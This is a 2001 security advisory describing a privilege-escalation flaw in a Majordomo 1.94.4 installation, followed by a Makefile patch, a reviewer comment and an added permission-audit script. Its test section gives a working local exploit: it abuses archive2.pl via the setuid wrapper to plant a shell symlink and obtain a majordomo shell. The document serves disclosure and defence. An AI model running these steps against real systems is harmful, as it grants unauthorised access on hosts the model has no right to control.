Majordomo Insecure Installation Issue

Published: 2001-09-24
Updated: 2001-09-24
Severity: Medium
Threat: Privilege escalation
Error type: Design error
Exploitation: Server mode

Affected systems

Majordomo version 1.94.4

Detailed description

Majordomo is a program that automatically manages mailing lists. If the administrator did not install it the way the INSTALL file describes, a vulnerability exists that lets an ordinary user gain the privileges of the Majordomo user.

Test code

$ id -a
uid=1001(marco) gid=100(users) groups=100(users)

This could happen if you give it a /home/majordomo

$ ls -al /home/|grep majordomo
drwxr-x--x 6 majordom daemon 4096 Sep 13 23:50 majordomo/

Suidbit + executable for everyone (this is where the patch comes in)

$ ls -al ~majordomo/wrapper
-rwsr-xr-x 1 root daemon 16451 Aug 31 13:51 /home/majordomo/wrapper*

This is the program we are going to abuse:

$ ls -al ~majordomo/archive2.pl
-rwxr-xr-x 1 majordom daemon 5234 Aug 31 13:51 /home/majordomo/archive2.pl*

Make a template

$ echo "ln -s /bin/sh ~/majordomo/sh 2>/dev/null">test

Append majordomo's .bash_profile (or .profile etc) with your template using the buggy archive2.pl (it is not wrapper that is buggy here, but rather archive2.pl).

$ ~majordomo/wrapper archive2.pl -f .bash_profile -a ~marco/test

Now hit the .bash_profile (sometimes the majordomo admin might need it and do the same).

$ su - majordomo
Password:
$ id -a
uid=666(majordomo) gid=2(daemon) groups=2(daemon)
$ exit

See if it worked:

$ ls -al ~majordomo/sh
lrwxrwxrwx 1 majordom daemon 7 Sep 13 23:57 /home/majordomo/sh -> /bin/sh*

Yes, it worked, now someone could abuse it:

$ ~majordomo/wrapper sh
sh-2.05$ id -a
uid=666(majordomo) gid=2(daemon) groups=100(users)
sh-2.05$

As you can see, we are 'majordomo'.

Solution

Patch:

--- Simple patch to make default install more secure ---

--- Makefile.orig Fri Sep 14 09:43:45 2001 +++ Makefile Fri Sep 14 09:44:20 2001 @@ -42,7 +42,7 @@ # change these values! WRAPPER_OWNER = root WRAPPER_GROUP = $(W_GROUP) -WRAPPER_MODE = 4755 +WRAPPER_MODE = 4750 POSIX = -DPOSIX_UID=$(W_USER) -DPOSIX_GID=$(W_GROUP) # Otherwise, if your system is NOT POSIX (e.g. SunOS 4.x, SGI Irix 4, # HP DomainOS) then comment out the above four lines and uncomment

Related information

m.v.berkum at obit.nl
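
Review bot: WRAPPER_MODE = 4750 only narrows who can run the setuid-root wrapper to members of WRAPPER_GROUP = $(W_GROUP), and nothing in the hunk says who belongs in that group. Extend the "# change these values!" comment to state that $(W_GROUP) must contain only the accounts that have to invoke wrapper, because every member of that group keeps the access shown in the test session. The hunk also leaves archive2.pl untouched, which the report names as the buggy component, so that script deserves its own fix.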
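
A local audit for the install condition this advisory describes, a setuid wrapper that any local user can reach and execute. This is an added example, not part of the original advisory or of Majordomo; the function names are hypothetical and the install directory is assumed to be passed as the first argument (the advisory's session uses /home/majordomo).

```shell
#!/bin/sh
# Added example: audit a Majordomo install directory for the exposure
# described in the advisory. Function names are hypothetical.

# wrapper_exposed DIR
# Succeeds when DIR/wrapper has both the setuid bit and the
# other-execute bit set (for example mode 4755).
wrapper_exposed() {
    [ -n "$(find "$1/wrapper" -prune -type f -perm -4001 2>/dev/null)" ]
}

# dir_reachable DIR
# Succeeds when users outside the owner and group can traverse DIR
# (other-execute bit, as in the advisory's drwxr-x--x home directory).
dir_reachable() {
    [ -n "$(find "$1" -prune -type d -perm -0001 2>/dev/null)" ]
}

# audit_majordomo DIR
# Prints a verdict and returns 1 when the wrapper is exposed.
audit_majordomo() {
    dir="$1"
    if [ ! -f "$dir/wrapper" ]; then
        echo "SKIP: no wrapper found in $dir"
        return 0
    fi
    if wrapper_exposed "$dir"; then
        if dir_reachable "$dir"; then
            echo "FAIL: $dir/wrapper is setuid and runnable by any local user"
        else
            echo "WARN: $dir/wrapper is setuid and world-executable; only directory permissions block access"
        fi
        return 1
    fi
    echo "OK: $dir/wrapper is not executable by other users"
    return 0
}

# Run the audit when a directory is given on the command line.
if [ "$#" -gt 0 ]; then
    audit_majordomo "$1"
fi
```

A FAIL or WARN result means the wrapper mode should be changed to the 4750 value from the patch and the membership of the wrapper's group reviewed.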